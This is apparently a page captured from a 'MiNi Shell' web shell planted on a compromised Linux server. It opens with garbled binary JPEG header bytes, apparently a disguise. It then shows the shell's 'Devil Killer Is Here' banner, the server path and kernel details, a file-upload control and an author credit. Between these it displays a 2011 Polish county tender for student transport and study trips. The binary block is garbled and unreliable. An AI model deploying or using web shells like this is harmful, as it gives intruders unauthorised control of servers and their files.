JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111014/336894-N-2011.html

<p class="kh_header"><b>Kazimierza Wielka: Odwóz uczestników projektu oraz organizacja wyjazdów studyjnych w projekcie Wyrównuję, doskonalę i poznaję w ramach działania 9.1., Poddziałanie 9.1.2 PO KL, Priorytet IX.</b><br>
<b>Numer ogłoszenia: 336894 - 2011; data zamieszczenia: 14.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Kazimierskiego , ul. Tadeusza Kościuszki 12, 28-500 Kazimierza Wielka, woj. świętokrzyskie, tel. 041 3502300, 3502321, faks 041 3502313.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.kazimierzaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odwóz uczestników projektu oraz organizacja wyjazdów studyjnych w projekcie Wyrównuję, doskonalę i poznaję w ramach działania 9.1., Poddziałanie 9.1.2 PO KL, Priorytet IX..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Przedmiotem zamówienia jest:
1. świadczenie usługi w zakresie transportu (umowa zlecenie) - odwóz uczestników projektu pn:Wyrównuję, doskonalę i poznaję.  Projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Uczestnikami projektu są uczniowie LO w Kazimierzy Wielkiej (95 uczniów), LO w Odonowie (39 uczniów) oraz LO w Cudzynowicach (15 uczniów). Wykonawca (przewoźnik) zobowiązany jest do odwozu uczestników projektu zgodnie z godzinami wyznaczonymi przez koordynatora projektu po zakończeniu zajęć w poszczególnych szkołach (zgodnie z harmonogramem, który otrzyma od koordynatora projektu co najmniej dwa tygodnie przed planowanym terminem odwozu). Szacunkowa łączna długość tras przejazdów określonych dla całego przedmiotu zamówienia wymienionego w harmonogramie przewozu wynosi 26220 km. Liczba określonych kilometrów w ramach odwozu jest liczbą prognozowaną; jednakże nie może być podstawą do roszczeń, zarówno w sytuacji zmiany tras sieci dróg jak i wprowadzonych doraźnie objazdów, co oznacza, iż zamawiający nie ponosi odpowiedzialności, a co za tym idzie nie ponosi kosztów poniesionych w związku z ewentualną zmianą organizacji ruchu wprowadzoną przez zarządcę drogi z przyczyn niezależnych od zamawiającego. 
2. Organizacja wyjazdów studyjnych (umowa zlecenie) - dwa dwudniowe wyjazdy dla 149 uczestników projektu na terenie województwa świętokrzyskiego i małopolskiego wraz z noclegiem i wyżywieniem (zgodnie z wytycznymi koordynatora projektu, które muszą być tożsame z celem głównym oraz celami szczegółowymi projektu).
3.  Wykonawca zobowiązany jest przedstawić Zamawiającemu do akceptacji, najpóźniej dwa tygodnie przed planowanym terminem wyjazdu program wyjazdów studyjnych. Program musi zawierać trasy przejazdu, godziny odjazdów z miejsca wskazanego przez Zamawiającego, opis odwiedzanych miejsc, ilość i rodzaj posiłków dla uczestników wyjazdów, miejsc noclegowych oraz przewidywanej godziny powrotu.

B. Terminy świadczenia usług oraz trasa przejazdu:
Dla zadania 1:
1. Przedmiotem zamówienia jest świadczenie:
a) 46 usług odwozu  wskazanej ilości uczniów od miejsca podstawienia pojazdu tj. siedziby LO w Kazimierzy Wielkiej, LO w Odonowie oraz LO w Cudzynowicach  do miejsca docelowego.
2. Adresy docelowych miejsc przewozu uczestników projektu oraz terminy wykonania usług zostały określone w harmonogramie odwozu.
3. Zamawiający określił następujące okresy wykonania przedmiotu zamówienia:
a) termin rozpoczęcia listopad 2011r.,
b) termin zakończenia styczeń 2013r.
4. Usługa realizowana będzie od poniedziałku do piątku z wyłączeniem dni wolnych od zajęć szkolnych tj. wakacji zimowych i letnich, przerw świątecznych oraz dni zatwierdzonych przez Ministra Edukacji Narodowej jako dni wolne od zajęć szkolnych.
5. Zamawiający zastrzega sobie możliwość zmiany godzin kursów, skrócenia lub wydłużenia trasy przejazdu oraz ilości przewozów w przypadku zmiany harmonogramu zajęć projektowych. Wszelkie zmiany będą potwierdzone telefonicznie i pisemnie.

Dla zadania 2:
1.Przedmiotem zamówienia jest świadczenie:
a) 2 wyjazdów dwudniowych dla wskazanej liczby uczestników projektu od miejsca podstawienia pojazdu do miejsca docelowego wyjazdu studyjnego.
2. Wyjazdy studyjne mają być zorganizowane na terenie województwa świętokrzyskiego oraz  małopolskiego zgodnie z celami projektu (zgodnie z  wytycznymi koordynatora projektu, które zostaną Wykonawcy przedstawione najpóźniej miesiąc przed planowanym terminem wyjazdu).
3. Zamawiający określił następujące terminy wykonania przedmiotu zamówienia:
a) termin pierwszego wyjazdu studyjnego - lipiec 2012 r.,
b) termin drugiego wyjazdu studyjnego - sierpień 2012 r.
4. zamawiający zastrzega sobie możliwość zmiany programu wyjazdów oraz terminów ich realizacji w przypadku zmiany harmonogramu realizacji projektu. Wszelkie zmiany będą potwierdzane telefonicznie i pisemnie.

C Wymagania dotyczące pojazdów:
Dla zadania 1 i 2:
1.  Przewozy uczestników projektu odbywać się mogą wyłącznie środkami transportu spełniającymi wymagania techniczne określone w przepisach ustawy - Prawo o ruchu drogowym (t.j. Dz. U. z 2005r, Nr 108, poz. 908 z późn. zm.) i innych przepisach związanych z przewozem osób - ustawa z dnia 6 września 2001r. o transporcie drogowym (t.j. Dz. U. z 2007r. Nr 125, poz. 874 z późn. zm.).
2. Wykonawca musi zapewnić przewożonym uczestnikom projektu odpowiednie warunki bezpieczeństwa i higieny: utrzymanie w czystości i porządku pojazdów, przestrzeganie przepisów przeciwpożarowych i BHP, ubezpieczenie pojazdów i uczestników projektu na czas przewozu z tytułu szkód, które mogą wyniknąć w związku z wykonywaniem zamówienia.
3. Wykonawca winien dysponować taką ilością środków transportu (autobusów lub busów), by zapewnić jednorazowy i w tym samym czasie, przewóz uczestników projektu podczas każdego zadania wymienionego w harmonogramie przewozu.
4. Usługi objęte zamówieniem winny być świadczone środkami transportu:
a) przystosowanymi do przewozu młodzieży szkolnej,
b) odpowiednio oznaczonymi na czas przewozu, że są wykorzystywane do transportu młodzieży szkolnej,
c) spełniającymi wszelkie wymogi bezpieczeństwa i kodeksu drogowego,
d) posiadającymi klimatyzację,
e) prowadzonymi przez osoby mające odpowiednie uprawnienia do świadczenia tych usług ze szczególną starannością i troską o życie i zdrowie.
5. Uczestnicy projektu przewożeni będą pojazdami przystosowanymi do ich przewożenia na miejscach siedzących i tylko takie miejsca mogą być uznane za spełniające warunki (nie przewiduje się przewozu na stojąco).
6. Wykonawca ubezpiecza pasażerów od wszelkich szkód powstałych podczas przewozu i pozostających w związku z przewozem. Wykonawca zobowiązany jest do ponoszenia kosztów związanych z eksploatacją i używaniem pojazdów własnych.
7. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych uczestników projektu.
8. Wykonawca odpowiada za sprawność techniczną pojazdów służących do wykonania usług stanowiących przedmiot zamówienia.
9. Wykonawca zobowiązany jest do poniesienia ewentualnych dodatkowych kosztów związanych z awarią pojazdów.
10. W przypadku awarii środka transportowego (z jakiejkolwiek przyczyny) Wykonawca zapewni niezwłocznie zastępczy środek transportu spełniający wszystkie warunki zamawiającego, w taki sposób aby nie powodować opóźnień czasowych oraz poniesie pełną odpowiedzialność z tego tytułu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje wykonania zamówień uzupełniających zgodnie z art. 67 ust 1 pkt 5 ustawy Pzp w sytuacji gdy do wniosku o dofinansowanie zostaną wprowadzone i zaakceptowane przez biuro POKL zmiany związane z przedmiotowym projektem.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-0, 60.10.00.00-9, 63.51.00.00-7, 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; Wykonawca musi złożyć oświadczenie że posiada uprawnienia niezbędne do wykonania zamówienia - (załącznik nr 2) do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten uznany zostanie za spełniony na podstawie złożonych referencji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponujący potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia lub przedstawiający pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; Wykonawca musi złożyć oświadczenie że posiada potencjał techniczny oraz osoby zdolne do wykonania zamówienia - (załącznik nr 2) do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; Wykonawca musi złożyć oświadczenie że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - (załącznik nr 2) do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz OFERTOWY, stanowiący (załącznik nr 1) do specyfikacji istotnych warunków zamówienia, 
2) parafowany projekt umowy, stanowiący załącznik nr 4 (dla części 1 zamówienia), załącznik nr 5 (dla części 2 zamówienia) do specyfikacji istotnych warunków zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana terminu wykonywania zamówienia w przypadku zmiany umowy o dofinansowanie projektu WND.POKL.09.01.02-26-086/11</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.kazimierzaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Projektu, Zespół Szkół Zawodowych, Odonów 54, 28 - 500 Kazimierza Wielka..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2011 godzina 10:00, miejsce: Powiat Kazimierski, ul. T. Kościuszki12, 28 - 500 Kazimierza Wielka,  pokój nr 106, piętro I..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1., Poddziałanie 9.1.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com